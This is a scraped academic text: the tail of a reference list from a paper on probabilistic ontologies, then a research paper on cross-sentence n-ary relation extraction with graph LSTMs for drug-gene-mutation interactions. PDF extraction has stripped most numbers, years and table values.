de deteccao de fraude. revista da cgu iv( ): – . haberlin r. . probabilistic ontology reference architecture and development methodology. phd thesis, george mason university. haberlin r, costa pc, laskey kb. a. hypothesis management in support of inferential reasoning. in: proceedings of the fifteenth international command and control research and technology symposium. haberlin r, costa pc, laskey kb. b. a model-based systems engineering approach to hypothesis management. in: proceedings of the third international conference on model-based systems engineering. haberlin r, costa pc, laskey kb. . probabilistic ontology architecture for a terrorist identification decision support system. in: proceedings of the nineteenth international command and control research and technology symposium. hazman m, r. el-beltagy s, rafea a. . a survey of ontology learning approaches. international journal of computer applications ( ): – doi . / - . heckerman d, meek c, koller d. . probabilistic models for relational data. tech report msr-tr- - . microsoft research. huber gp. . methods for quantifying subjective probabilities and multi-attribute utilities*†. decision sciences ( ): – doi . /j. - . .tb .x. incose. . incose systems engineering handbook: a guide for system life cycle processes and activities. 
fourth edition. new york: wiley. jacobson i, booch g, rumbaugh j. . the unified software development process. boston: addison-wesley professional. kahneman d, slovic p, tversky a. . judgment under uncertainty: heuristics and biases. cambridge: cambridge university press. koller d, levy a, pfeffer a. . p-classic: a tractable probabilistic description logic. in: proceedings of aaai- . menlo park: aaai, – . korb kb, nicholson ae. . bayesian artificial intelligence. st edition. new york: chapman & hall/crc. kruchten p. . the rational unified process: an introduction. edition. boston: addison-wesley professional. laskey kb. . mebn: a language for first-order bayesian knowledge bases. artificial intelligence ( – ): – doi . /j.artint. . . . laskey kb, mahoney sm. . network engineering for agile belief network mod- els. ieee transactions on knowledge and data engineering ( ): – doi . / . . laskey kb, mahoney sm, wright e. . hypothesis management in situation- specific network construction. in: koller d, ed. uncertainty in artificial intelligence: proceedings of the seventeenth conference. san mateo: morgan kaufman, . carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.artint. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. laskey kj, laskey kb. . uncertainty reasoning for the world wide web: report on the urw -xg incubator group. in: proceedings of the fourth international workshop on uncertainty reasoning for the semantic web (ursw ). karlsruhe. lukasiewicz t. . expressive probabilistic description logics. artificial intelligence ( – ): – doi . /j.artint. . . . luna jeo, revoredo k, cozman fg. . learning sentences and assessments in probabilistic description logics. in: proceedings of the th uncertainty reasoning for the semantic web (ursw ) on the th international semantic web conference (iswc ), – . mahoney s, laskey kb. . constructing situation specific belief networks. in: proceedings of the th annual conference on uncertainty in artificial intelligence (uai- ). san francisco: morgan kaufmann. matsumoto s. . framework based in plug-ins for reasoning with probabilistic ontologies. m.sc. thesis, university of brasilia, brasilia, brazil. matsumoto s, carvalho rn, ladeira m, costa pc, santos ll, silva d, onishi m, machado e, cai k. . unbbayes: a java framework for probabilistic models in ai. in: java in academia and research. hong kong: iconcept press. o’hagan a, buck ce, daneshkhah a, eiser jr, garthwaite ph, jenkinson dj, rakow jeoat. . uncertain judgements: eliciting experts’ probabilities. st edition. london: wiley. oliveira a. . licitacao: fraudes comuns nas aquisicoes de bens, enquadramento legal e procedimentos preventivos. undergraduate thesis, universidade federal de santa catarina, florianopolis, santa catarina, brazil. pearl j. . probabilistic reasoning in intelligent systems: networks of plausible inference. st edition. cambridge: morgan kaufmann. project management institute. . a guide to the project management body of knowl- edge (pmbok guide). newtown square: project management institute. reed sl, lenat db. . mapping ontologies into cyc. in: proceedings of the aaai conference workshop on ontologies for the semantic web. – . renooij s. . probability elicitation for belief networks: issues to consider. the knowledge engineering review ( ): – doi . /s . royce ww. . managing the development of large software systems: concepts and techniques. 
in: proceedings of ieee westcon. piscataway: ieee, – . reprinted in proceedings of the ninth international conference on software engineering, march , pp. . rumbaugh j, jacobson i, booch g. . the unified modeling language reference manual. boston: addison-wesley professional. santos ll, carvalho rn, ladeira m, weigang l. . probabilistic ontologies incre- mental modeling using unbbayes. in: proceedings of encontro nacional de inteligência artificial e computacional, eniac. sao carlos, – . schum da, starace s. . the evidential foundations of probabilistic reasoning. evanston: northwestern university press. sommerville i. . software engineering. edition. boston: addison wesley. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.artint. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. sure y, staab s, studer r. . on-to-knowledge methodology (otkm). in: handbook on ontologies. new york: springer, – . wallsten ts, budescu dv. . encoding subjective probabilities: a psychological and psychometric review. management science ( ): – doi . /mnsc. . . . wiegers ke. . software requirements. nd edition. redmond: microsoft press. winkler rl. . the assessment of prior distributions in bayesian analysis. journal of the american statistical association ( ): – doi . / . . . yang y, calmet j. . ontobayes: an ontology-driven uncertainty model. in: proceed- ings of the international conference on computational intelligence for modelling, control and automation and international conference on intelligent agents, web technologies and internet commerce vol- (cimca-iawtic’ ) - volume . piscataway: ieee computer society, – . carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /mnsc. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. cross-sentence n-ary relation extraction with graph lstms nanyun peng ∗ hoifung poon chris quirk kristina toutanova ∗ wen-tau yih center for language and speech processing, computer science department johns hopkins university, baltimore, md, usa microsoft research, redmond, wa, usa google research, seattle, wa, usa npeng @jhu.edu, kristout@google.com {hoifung,chrisq,scottyih}@microsoft.com abstract past work in relation extraction has focused on binary relations in single sentences. re- cent nlp inroads in high-value domains have sparked interest in the more general setting of extracting n-ary relations that span mul- tiple sentences. in this paper, we explore a general relation extraction framework based on graph long short-term memory networks (graph lstms) that can be easily extended to cross-sentence n-ary relation extraction. the graph formulation provides a unified way of exploring different lstm approaches and in- corporating various intra-sentential and inter- sentential dependencies, such as sequential, syntactic, and discourse relations. a robust contextual representation is learned for the en- tities, which serves as input to the relation clas- sifier. this simplifies handling of relations with arbitrary arity, and enables multi-task learning with related relations. we evaluate this frame- work in two important precision medicine set- tings, demonstrating its effectiveness with both conventional supervised learning and distant supervision. cross-sentence extraction pro- duced larger knowledge bases. and multi-task learning significantly improved extraction ac- curacy. 
a thorough analysis of various lstm approaches yielded useful insight into the impact of linguistic analysis on extraction accuracy. (* this research was conducted when the authors were at microsoft research.) introduction relation extraction has made great strides in newswire and web domains. recently, there has been increasing interest in applying relation extraction to high-value domains such as biomedicine. the advent of the $ human genome (http://www.illumina.com/systems/hiseq-x-sequencing-system.html) heralds the dawn of precision medicine, but progress in personalized cancer treatment has been hindered by the arduous task of interpreting genomic data using prior knowledge. for example, given a tumor sequence, a molecular tumor board needs to determine which genes and mutations are important, and what drugs are available to treat them. already the research literature has a wealth of relevant knowledge, and it is growing at an astonishing rate. pubmed (https://www.ncbi.nlm.nih.gov/pubmed), the online repository of biomedical articles, adds two new papers per minute, or one million each year. it is thus imperative to advance relation extraction for machine reading. in the vast literature on relation extraction, past work focused primarily on binary relations in single sentences, limiting the available information. consider the following example: "the deletion mutation on exon- of egfr gene was present in patients, while the l e point mutation on exon- was noted in . all patients were treated with gefitinib and showed a partial response." collectively, the two sentences convey the fact that there is a ternary interaction between the three entities in bold, which is not expressed in either sentence alone. namely, tumors with l e mutation in egfr gene can be treated with gefitinib. extracting such knowledge clearly requires moving beyond binary relations and single sentences. n-ary relations and cross-sentence extraction have received relatively little attention in the past. figure : an example document graph for a pair of sentences expressing a ternary interaction (tumors with l e mutation in egfr gene respond to gefitinib treatment). for simplicity, we omit edges between adjacent words or representing discourse relations. prior work on n-ary relation extraction focused on single sentences (palmer et al., ; mcdonald et al., ) or entity-centric attributes that can be extracted largely independently (chinchor, ; surdeanu and heng, ). prior work on cross-sentence extraction often used coreference to gain access to arguments in a different sentence (gerber and chai, ; yoshikawa et al., ), without truly modeling inter-sentential relational patterns. (see section for a more detailed discussion.) a notable exception is quirk and poon ( ), which applied distant supervision to general cross-sentence relation extraction, but was limited to binary relations.
in this paper, we explore a general framework for cross-sentence n-ary relation extraction, based on graph long short-term memory networks (graph lstms). by adopting the graph formulation, our framework subsumes prior approaches based on chain or tree lstms, and can incorporate a rich set of linguistic analyses to aid relation extraction. relation classification takes as input the entity representations learned from the entire text, and can be easily ex- tended for arbitrary relation arity n. this approach also facilitates joint learning with kindred relations where the supervision signal is more abundant. we conducted extensive experiments on two im- portant domains in precision medicine. in both dis- tant supervision and supervised learning settings, graph lstms that encode rich linguistic knowledge outperformed other neural network variants, as well as a well-engineered feature-based classifier. multi- task learning with sub-relations led to further im- provement. syntactic analysis conferred a significant benefit to the performance of graph lstms, espe- cially when syntax accuracy was high. in the molecular tumor board domain, pubmed- scale extraction using distant supervision from a small set of known interactions produced orders of magnitude more knowledge, and cross-sentence ex- traction tripled the yield compared to single-sentence extraction. manual evaluation verified that the accu- racy is high despite the lack of annotated examples. cross-sentence n-ary relation extraction let e , · · · ,em be entity mentions in text t . rela- tion extraction can be formulated as a classification problem of determining whether a relation r holds for e , · · · ,em in t . for example, given a cancer patient with mutation v in gene g, a molecular tumor board seeks to find if this type of cancer would re- spond to drug d. literature with such knowledge has been growing rapidly; we can help the tumor board by checking if the respond relation holds for the (d,g,v) triple. traditional relation extraction methods focus on binary relations where all entities occur in the same sentence (i.e., m = and t is a sentence), and cannot handle the aforementioned ternary relations. moreover, as we focus on more complex relations and n increases, it becomes increasingly rare that the related entities will be contained entirely in a single sentence. in this paper, we generalize extraction to cross-sentence, n-ary relations, where m > and t can contain multiple sentences. as will be shown in our experiments section, n-ary relations are crucial for high-value domains such as biomedicine, and expanding beyond the sentence boundary enables the extraction of more knowledge. in the standard binary-relation setting, the dom- inant approaches are generally defined in terms of the shortest dependency path between the two en- tities in question, either by deriving rich features from the path or by modeling it using deep neural networks. generalizing this paradigm to the n-ary setting is challenging, as there are ( n ) paths. one apparent solution is inspired by davidsonian seman- tics: first, identify a single trigger phrase that sig- nifies the whole relation, then reduce the n-ary re- lation to n binary relations between the trigger and an argument. however, challenges remain. it is of- ten hard to specify a single trigger, as the relation is manifested by several words, often not contigu- ous. 
moreover, it is expensive and time-consuming to annotate training examples, especially if triggers are required, as is evident in prior annotation efforts such as genia (kim et al., ). the realistic and widely adopted paradigm is to leverage indirect supervision, such as distant supervision (craven and kumlien, ; mintz et al., ), where triggers are not available. additionally, lexical and syntactic patterns signifying the relation will be sparse. to handle such sparsity, traditional feature-based approaches require extensive engineering and large data. unfortunately, this challenge becomes much more severe in cross-sentence extraction when the text spans multiple sentences. to overcome these challenges, we explore a general relation extraction framework based on graph lstms. by learning a continuous representation for words and entities, lstms can handle sparsity effectively without requiring intense feature engineering. the graph formulation subsumes prior lstm approaches based on chains or trees, and can incorporate rich linguistic analyses. this approach also opens up opportunities for joint learning with related relations. for example, the response relation over d,g,v also implies a binary sub-relation over drug d and mutation v, with the gene underspecified. even with distant supervision, the supervision signal for n-ary relations will likely be sparser than their binary sub-relations. our approach makes it very easy to use multi-task learning over both the n-ary relations and their sub-relations. graph lstms learning a continuous representation can be effective for dealing with lexical and syntactic sparsity. for sequential data such as text, recurrent neural networks (rnns) are quite popular. they resemble hidden markov models (hmms), except that discrete hidden states are replaced with continuous vectors, and emission and transition probabilities with neural networks. figure : a general architecture for cross-sentence n-ary relation extraction based on graph lstms (word embeddings for input text, graph lstm, contextual entity representations, concatenation, relation classifier). conventional rnns with sigmoid units suffer from gradient diffusion or explosion, making training very difficult (bengio et al., ; pascanu et al., ). long short-term memory (lstms) (hochreiter and schmidhuber, ) combats these problems by using a series of gates (input, forget and output) to avoid amplifying or suppressing gradients during backpropagation. consequently, lstms are much more effective in capturing long-distance dependencies, and have been applied to a variety of nlp tasks. however, most approaches are based on linear chains and only explicitly model the linear context, which ignores a variety of linguistic analyses, such as syntactic and discourse dependencies. in this section, we propose a general framework that generalizes lstms to graphs. while there is some prior work on learning tree lstms (tai et al., ; miwa and bansal, ), to the best of our knowledge, graph lstms have not been applied to any nlp task yet. figure shows the architecture of this approach. the input layer is the word embedding of input text. next is the graph lstm which learns a contextual representation for each word. for the entities in question, their contextual representations are concatenated and become the input to the relation classifiers.
for a multi-word entity, we simply used the average of its word representations and leave the exploration of more sophisticated aggregation approaches to future work. the layers are trained jointly with backpropagation. this framework is agnostic to the choice of classifiers. jointly designing classifiers with graph lstms would be interesting future work. figure : the graph lstms used in this paper. the document graph (top) is partitioned into two directed acyclic graphs (bottom); the graph lstm is constructed by a forward pass (left to right) followed by a backward pass (right to left). note that information goes from dependency child to parent. at the core of the graph lstm is a document graph that captures various dependencies among the input words. by choosing what dependencies to include in the document graph, graph lstms naturally subsume linear-chain or tree lstms. compared to conventional lstms, the graph formulation presents new challenges. due to potential cycles in the graph, a straightforward implementation of backpropagation might require many iterations to reach a fixed point. moreover, in the presence of a potentially large number of edge types (adjacent-word, syntactic dependency, etc.), parametrization becomes a key problem. in the remainder of this section, we first introduce the document graph and show how to conduct backpropagation in graph lstms. we then discuss two strategies for parametrizing the recurrent units. finally, we show how to conduct multi-task learning with this framework. . document graph to model various dependencies from linguistic analysis at our disposal, we follow quirk and poon ( ) and introduce a document graph to capture intra- and inter-sentential dependencies. a document graph consists of nodes that represent words and edges that represent various dependencies such as linear context (adjacent words), syntactic dependencies, and discourse relations (lee et al., ; xue et al., ). figure shows the document graph for our running example; this instance suggests that tumors with l e mutation in egfr gene respond to the drug gefitinib. this document graph acts as the backbone upon which a graph lstm is constructed. if it contains only edges between adjacent words, we recover linear-chain lstms. similarly, other prior lstm approaches can be captured in this framework by restricting edges to those in the shortest dependency path or the parse tree. . backpropagation in graph lstms conventional lstms are essentially very deep feed-forward neural networks. for example, a left-to-right linear lstm has one hidden vector for each word. this vector is generated by a neural network (recurrent unit) that takes as input the embedding of the given word and the hidden vector of the previous word. in discriminative learning, these hidden vectors then serve as input for the end classifiers, from which gradients are backpropagated through the whole network. generalizing such a strategy to graphs with cycles typically requires unrolling recurrence for a number of steps (scarselli et al., ; li et al., ; liang et al., ). essentially, a copy of the graph is created for each step that serves as input for the next. the result is a feed-forward neural network through time, and backpropagation is conducted accordingly. in principle, we could adopt the same strategy.
effectively, gradients are backpropagated in a manner similar to loopy belief propagation (lbp). however, this makes learning much more expensive as each update step requires multiple iterations of backpropagation. moreover, loopy backpropagation could suffer from the same problems encountered in lbp, such as oscillation or failure to converge. we observe that dependencies such as coreference and discourse relations are generally sparse, so the backbone of a document graph consists of the linear chain and the syntactic dependency tree. as in belief propagation, such structures can be leveraged to make backpropagation more efficient by replacing synchronous updates, as in the unrolling strategy, with asynchronous updates, as in linear-chain lstms. this opens up opportunities for a variety of strategies in ordering backpropagation updates. in this paper, we adopt a simple strategy that performed quite well in preliminary experiments, and leave further exploration to future work. specifically, we partition the document graph into two directed acyclic graphs (dags). one dag contains the left-to-right linear chain, as well as other forward-pointing dependencies. the other dag covers the right-to-left linear chain and the backward-pointing dependencies. figure illustrates this strategy. effectively, we partition the original graph into the forward pass (left-to-right), followed by the backward pass (right-to-left), and construct the lstms accordingly. when the document graph only contains linear-chain edges, the graph lstm is exactly a bi-directional lstm (bilstm). . the basic recurrent propagation unit a standard lstm unit consists of an input vector (word embedding), a memory cell and an output vector (contextual representation), as well as several gates. the input gate and output gate control the information flowing into and out of the cell, whereas the forget gate can optionally remove information from the recurrent connection to a precedent unit. in linear-chain lstms, each unit contains only one forget gate, as it has only one direct precedent (i.e., the adjacent-word edge pointing to the previous word). in graph lstms, however, a unit may have several precedents, including connections to the same word via different edges. we thus introduce a forget gate for each precedent, similar to the approach taken by tai et al. ( ) for tree lstms. encoding rich linguistic analysis introduces many distinct edge types besides word adjacency, such as syntactic dependencies, which opens up many possibilities for parametrization. this was not considered in prior syntax-aware lstm approaches (tai et al., ; miwa and bansal, ). in this paper, we explore two schemes that introduce more fine-grained parameters based on the edge types. full parametrization: our first proposal simply introduces a different set of parameters for each edge type, with computation specified below.

i_t = \sigma\big( W_i x_t + \sum_{j \in P(t)} U_i^{m(t,j)} h_j + b_i \big)
o_t = \sigma\big( W_o x_t + \sum_{j \in P(t)} U_o^{m(t,j)} h_j + b_o \big)
\tilde{c}_t = \tanh\big( W_c x_t + \sum_{j \in P(t)} U_c^{m(t,j)} h_j + b_c \big)
f_{tj} = \sigma\big( W_f x_t + U_f^{m(t,j)} h_j + b_f \big)
c_t = i_t \odot \tilde{c}_t + \sum_{j \in P(t)} f_{tj} \odot c_j
h_t = o_t \odot \tanh(c_t)

as in standard chain lstms, x_t is the input word vector for node t, h_t is the hidden state vector for node t, the W's are the input weight matrices, and the b's are the bias vectors. \sigma, \tanh, and \odot represent the sigmoid function, the hyperbolic tangent function, and the hadamard product (pointwise multiplication), respectively. the main differences lie in the recurrence terms.
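as a concrete illustration, the following is a minimal numpy sketch of this fully parametrized recurrent unit, with one recurrent weight matrix per gate and edge type and one forget gate per predecessor. the class name, parameter names, and initialization are ours and purely illustrative; this is not the authors' theano implementation.

```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

class GraphLSTMUnit:
    """sketch of the fully parametrized graph lstm unit: one recurrent weight
    matrix per gate and per edge type, and one forget gate per predecessor."""

    def __init__(self, input_dim, hidden_dim, edge_types, rng=np.random):
        def mat(rows, cols):
            return rng.uniform(-0.1, 0.1, (rows, cols))
        self.W = {g: mat(hidden_dim, input_dim) for g in "iofc"}
        self.b = {g: np.zeros(hidden_dim) for g in "iofc"}
        # a separate recurrent weight matrix per gate and per edge type.
        self.U = {g: {e: mat(hidden_dim, hidden_dim) for e in edge_types}
                  for g in "iofc"}

    def step(self, x_t, predecessors):
        """predecessors: list of (h_j, c_j, edge_type) for all incoming edges."""
        def rec(gate):
            # typed recurrent term summed over all predecessors.
            return sum(self.U[gate][e] @ h_j for h_j, _, e in predecessors)
        i_t = sigmoid(self.W["i"] @ x_t + rec("i") + self.b["i"])
        o_t = sigmoid(self.W["o"] @ x_t + rec("o") + self.b["o"])
        c_hat = np.tanh(self.W["c"] @ x_t + rec("c") + self.b["c"])
        c_t = i_t * c_hat
        # one forget gate per predecessor, typed by the connecting edge.
        for h_j, c_j, e in predecessors:
            f_tj = sigmoid(self.W["f"] @ x_t + self.U["f"][e] @ h_j + self.b["f"])
            c_t = c_t + f_tj * c_j
        h_t = o_t * np.tanh(c_t)
        return h_t, c_t
```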
in graph lstms, a unit might have multiple predecessors (P(t)), for each of which (j) there is a forget gate f_{tj} and a typed weight matrix U^{m(t,j)}, where m(t,j) signifies the connection type between t and j. the input and output gates (i_t, o_t) depend on all predecessors, whereas the forget gate (f_{tj}) only depends on the predecessor with which the gate is associated. c_t and \tilde{c}_t represent intermediate computation results within the memory cell, which take into account the input and forget gates, and will be combined with the output gate to produce the hidden representation h_t. full parameterization is straightforward, but it requires a large number of parameters when there are many edge types. for example, there are dozens of syntactic edge types, each corresponding to a stanford dependency label. as a result, in our experiments we resort to using only the coarse-grained types: word adjacency, syntactic dependency, etc. next, we will consider a more fine-grained approach by learning an edge-type embedding. edge-type embedding: to reduce the number of parameters and leverage potential correlation among fine-grained edge types, we learned a low-dimensional embedding of the edge types, and conducted an outer product of the predecessor's hidden vector and the edge-type embedding to generate a "typed hidden representation", which is a matrix. the new computation is as follows:

i_t = \sigma\big( W_i x_t + \sum_{j \in P(t)} U_i \times_T (h_j \otimes e_j) + b_i \big)
f_{tj} = \sigma\big( W_f x_t + U_f \times_T (h_j \otimes e_j) + b_f \big)
o_t = \sigma\big( W_o x_t + \sum_{j \in P(t)} U_o \times_T (h_j \otimes e_j) + b_o \big)
\tilde{c}_t = \tanh\big( W_c x_t + \sum_{j \in P(t)} U_c \times_T (h_j \otimes e_j) + b_c \big)
c_t = i_t \odot \tilde{c}_t + \sum_{j \in P(t)} f_{tj} \odot c_j
h_t = o_t \odot \tanh(c_t)

the U's are now l \times l \times d tensors (l is the dimension of the hidden vector and d is the dimension of the edge-type embedding), and h_j \otimes e_j is a tensor product that produces an l \times d matrix. \times_T denotes a tensor dot product defined as T \times_T A = \sum_d (T_{:,:,d} \cdot A_{:,d}), which produces an l-dimensional vector. the edge-type embedding e_j is jointly trained with the other parameters. . comparison with prior lstm approaches the main advantages of a graph formulation are its generality and flexibility. as seen in section . , linear-chain lstms are a special case when the document graph is the linear chain of adjacent words. similarly, tree lstms (tai et al., ) are a special case when the document graph is the parse tree. in graph lstms, the encoding of linguistic knowledge is factored from the backpropagation strategy (section . ), making it much more flexible, including introducing cycles. for example, miwa and bansal ( ) conducted joint entity and binary relation extraction by stacking an lstm for relation extraction on top of another lstm for entity recognition. in graph lstms, the two can be combined seamlessly using a document graph comprising both the word-adjacency chain and the dependency path between the two entities. the document graph can also incorporate other linguistic information. for example, coreference and discourse parsing are intuitively relevant for cross-sentence relation extraction. although existing systems have not yet been shown to improve cross-sentence relation extraction (quirk and poon, ), it remains an important future direction to explore incorporating such analyses, especially after adapting them to the biomedical domains (bell et al., ). . multi-task learning with sub-relations multi-task learning has been shown to be beneficial in training neural networks (caruana, ; collobert and weston, ; peng and dredze, ).
. comparison with prior lstm approaches

the main advantages of a graph formulation are its generality and flexibility. as seen in section . , linear-chain lstms are a special case when the document graph is the linear chain of adjacent words. similarly, tree lstms (tai et al., ) are a special case when the document graph is the parse tree. in graph lstms, the encoding of linguistic knowledge is factored from the backpropagation strategy (section . ), making it much more flexible, including the possibility of introducing cycles. for example, miwa and bansal ( ) conducted joint entity and binary relation extraction by stacking an lstm for relation extraction on top of another lstm for entity recognition. in graph lstms, the two can be combined seamlessly using a document graph comprising both the word-adjacency chain and the dependency path between the two entities. the document graph can also incorporate other linguistic information. for example, coreference and discourse parsing are intuitively relevant for cross-sentence relation extraction. although existing systems have not yet been shown to improve cross-sentence relation extraction (quirk and poon, ), it remains an important future direction to explore incorporating such analyses, especially after adapting them to the biomedical domains (bell et al., ).

. multi-task learning with sub-relations

multi-task learning has been shown to be beneficial in training neural networks (caruana, ; collobert and weston, ; peng and dredze, ). by learning contextual entity representations, our framework makes it straightforward to conduct multi-task learning. the only change is to add a separate classifier for each related auxiliary relation. all classifiers share the same graph lstm representation learner and word embeddings, and can potentially help each other by pooling their supervision signals. in the molecular tumor board domain, we applied this paradigm to joint learning of both the ternary relation (drug-gene-mutation) and its binary sub-relation (drug-mutation). experiment results show that this provides significant gains in both tasks.

implementation details

we implemented our methods using the theano library (theano development team, ). we used logistic regression for our relation classifiers. hyperparameters were set based on preliminary experiments on a small development dataset. training was done using mini-batched stochastic gradient descent (sgd) with batch size . we used a learning rate of . and trained for at most epochs, with early stopping based on development data (caruana et al., ; graves et al., ). the dimension for the hidden vectors in lstm units was set to , and the dimension for the edge-type embedding was set to . the word embeddings were initialized with the publicly available -dimensional glove word vectors trained on billion words from wikipedia and web text (pennington et al., ; http://nlp.stanford.edu/projects/glove/). other model parameters were initialized with random samples drawn uniformly from the range [− , ]. in multi-task training, we alternated among all tasks, each time passing through all data for one task and updating the parameters accordingly. this was repeated for epochs. (drug-gene pairs have much more data, so we sub-sampled those instances down to the same size as the main n-ary relation task.)

domain: molecular tumor boards

our main experiments focus on extracting ternary interactions over drugs, genes and mutations, which is important for molecular tumor boards. a drug-gene-mutation interaction is broadly construed as an association between the drug efficacy and the mutation in the given gene. there is no annotated dataset for this problem. however, due to the importance of such knowledge, oncologists have been painstakingly curating known relations from reading papers. such a manual approach cannot keep up with the rapid growth of the research literature, and the coverage is generally sparse and not up to date. however, the curated knowledge can be used for distant supervision.

. datasets

we obtained biomedical literature from pubmed central (http://www.ncbi.nlm.nih.gov/pmc/), consisting of approximately one million full-text articles as of . note that only a fraction of papers contain knowledge about drug-gene-mutation interactions. extracting such knowledge from the vast body of biomedical papers is exactly the challenge. as we will see in later subsections, distant supervision enables us to generate a sizable training set from a small number of manually curated facts, and the learned model was able to extract orders of magnitude more facts. in future work, we will explore incorporating more known facts for distant supervision and extracting from more full-text articles. we conducted tokenization, part-of-speech tagging, and syntactic parsing using splat (quirk et al., ), and obtained stanford dependencies (de marneffe et al., ) using stanford corenlp (manning et al., ).
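as a concrete illustration of how parses like these could be assembled into a document graph and then split into the two dags used for asynchronous backpropagation (section . ), here is a small python sketch; the edge inventory, function names, and data layout are assumptions for illustration rather than the exact pipeline of this paper.

```python
from collections import namedtuple

Edge = namedtuple("Edge", "src dst etype")  # src, dst are token indices in the document

def build_document_graph(n_tokens, dep_edges, coref_edges=(), discourse_edges=()):
    """document graph: adjacency backbone plus dependency/coreference/discourse edges."""
    edges = [Edge(i, i + 1, "adjacency") for i in range(n_tokens - 1)]
    edges += [Edge(h, d, "dependency") for h, d in dep_edges]     # head -> dependent
    edges += [Edge(a, b, "coreference") for a, b in coref_edges]  # sparse, cross-sentence
    edges += [Edge(a, b, "discourse") for a, b in discourse_edges]
    return edges

def partition_into_dags(n_tokens, edges):
    """split the graph into two dags so lstm updates can run asynchronously:
    a left-to-right pass (forward-pointing edges) and a right-to-left pass."""
    forward = [e for e in edges if e.dst > e.src]                 # includes the l2r chain
    backward = [Edge(i + 1, i, "adjacency") for i in range(n_tokens - 1)]
    backward += [e for e in edges if e.dst < e.src]               # backward-pointing deps
    return forward, backward

# toy usage: 5 tokens, one forward-pointing and one backward-pointing dependency
fwd, bwd = partition_into_dags(5, build_document_graph(5, dep_edges=[(1, 3), (4, 2)]))
```

each dag can then be processed in topological order, so every unit sees the finished hidden states of all its predecessors, exactly as in the bilstm special case when only adjacency edges are present.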
we used the entity taggers from literome (poon et al., ) to identify drug, gene and mutation mentions. we used the gene drug knowledge database (gdkd) (dienstmann et al., ) and the clinical interpretations of variants in cancer (civic) knowledge base (http://civic.genome.wustl.edu) for distant supervision. the knowledge bases distinguish fine-grained interaction types, which we do not use in this paper.

. distant supervision

after identifying drug, gene and mutation mentions in the text, co-occurring triples with known interactions were chosen as positive examples. however, unlike the single-sentence setting in standard distant supervision, care must be taken in selecting the candidates. since the triples can reside in different sentences, an unrestricted selection of text spans would risk introducing many obviously wrong examples. we thus followed quirk and poon ( ) in restricting the candidates to those occurring in a minimal span, i.e., we retain a candidate only if there is no other co-occurrence of the same entities in an overlapping text span with a smaller number of consecutive sentences. furthermore, we avoid picking unlikely candidates where the triples are far apart in the document. specifically, we considered entity triples within k consecutive sentences, ignoring paragraph boundaries. k = corresponds to the baseline of extraction within single sentences. we explored k ≤ , which captured a large fraction of candidates without introducing many unlikely ones.

only distinct drug-gene-mutation triples from the knowledge bases were matched in the text. even from such a small set of unique triples, we obtained , ternary relation instances that can serve as positive examples. for multi-task learning, we also considered drug-gene and drug-mutation sub-relations, which yielded , drug-gene and , drug-mutation relation instances as positive examples. we generate negative examples by randomly sampling co-occurring entity triples without known interactions, subject to the same restrictions above. we sampled the same number as positive examples to obtain a balanced dataset (we will release the dataset at http://hanover.azurewebsites.net).

. automatic evaluation

to compare the various models in our proposed framework, we conducted five-fold cross-validation, treating the positive and negative examples from distant supervision as gold annotation. to avoid train-test contamination, all examples from a document were assigned to the same fold. since our datasets are balanced by construction, we simply report average test accuracy on held-out folds.

model               single-sent.   cross-sent.
feature-based       .              .
cnn                 .              .
bilstm              .              .
graph lstm-embed    .              .
graph lstm-full     .              .
table : average test accuracy in five-fold cross-validation for drug-gene-mutation ternary interactions. feature-based used the best performing model in (quirk and poon, ) with features derived from shortest paths between all entity pairs.

model                  single-sent.   cross-sent.
feature-based          .              .
cnn                    .              .
bilstm                 .              .
bilstm-shortest-path   .              .
tree lstm              .              .
graph lstm-embed       .              .
graph lstm-full        .              .
table : average test accuracy in five-fold cross-validation for drug-mutation binary relations, with an extra baseline using a bilstm on the shortest dependency path (xu et al., b; miwa and bansal, ).
obviously, the results could be noisy (e.g., entity triples not known to have an interaction might actually have one), but this evaluation is automatic and can quickly evaluate the impact of various design choices.

we evaluated two variants of graph lstms: "graph lstm-full" with full parametrization and "graph lstm-embed" with edge-type embedding. we compared graph lstms with three strong baseline systems: a well-engineered feature-based classifier (quirk and poon, ), a convolutional neural network (cnn) (zeng et al., ; santos et al., ; wang et al., ), and a bi-directional lstm (bilstm). following wang et al. ( ), we used input attention for the cnn and an input window size of . quirk and poon ( ) only extracted binary relations; we extended their approach to ternary relations by deriving features for each entity pair (with added annotation to signify the two entity types) and pooling the features from all pairs. for binary relation extraction, prior syntax-aware approaches are directly applicable, so we also compared with a state-of-the-art tree lstm system (miwa and bansal, ) and a bilstm on the shortest dependency path between the two entities (bilstm-shortest-path) (xu et al., b).

table shows the results for cross-sentence, ternary relation extraction. all neural-network based models outperformed the feature-based classifier, illustrating their advantage in handling sparse linguistic patterns without requiring intense feature engineering. all lstms significantly outperformed the cnn in the cross-sentence setting, verifying the importance of capturing long-distance dependencies. the two variants of graph lstms perform on par with each other, though graph lstm-full has a small advantage, suggesting that further exploration of parametrization schemes could be beneficial. in particular, the edge-type embedding might improve by pretraining on unlabeled text with syntactic parses.

both graph variants significantly outperformed bilstms (p < . by mcnemar's chi-square test), though the difference is small. this result is intriguing. in quirk and poon ( ), the best system incorporated syntactic dependencies and outperformed the linear-chain variant (base) by a large margin. so why didn't graph lstms make an equally substantial gain by modeling syntactic dependencies?

one reason is that linear-chain lstms can already capture some of the long-distance dependencies available in syntactic parses. bilstms substantially outperformed the feature-based classifier, even without explicit modeling of syntactic dependencies. the gain cannot be entirely attributed to word embeddings, as lstms also outperformed cnns.

another reason is that syntactic parsing is less accurate in the biomedical domain. parse errors confuse the graph lstm learner, limiting the potential for gain. in section , we show supporting evidence in a domain where gold parses are available.

we also report accuracy on instances within single sentences, which exhibited a broadly similar set of trends. note that single-sentence and cross-sentence accuracies are not directly comparable, as the test sets are different (one subsumes the other).

we conducted the same experiments on the binary sub-relation between drug-mutation pairs.

               drug-gene-mut.   drug-mut.
bilstm         .                .
+multi-task    .                .
graph lstm     .                .
+multi-task    .                .
table : multi-task learning improved accuracy for both bilstms and graph lstms.
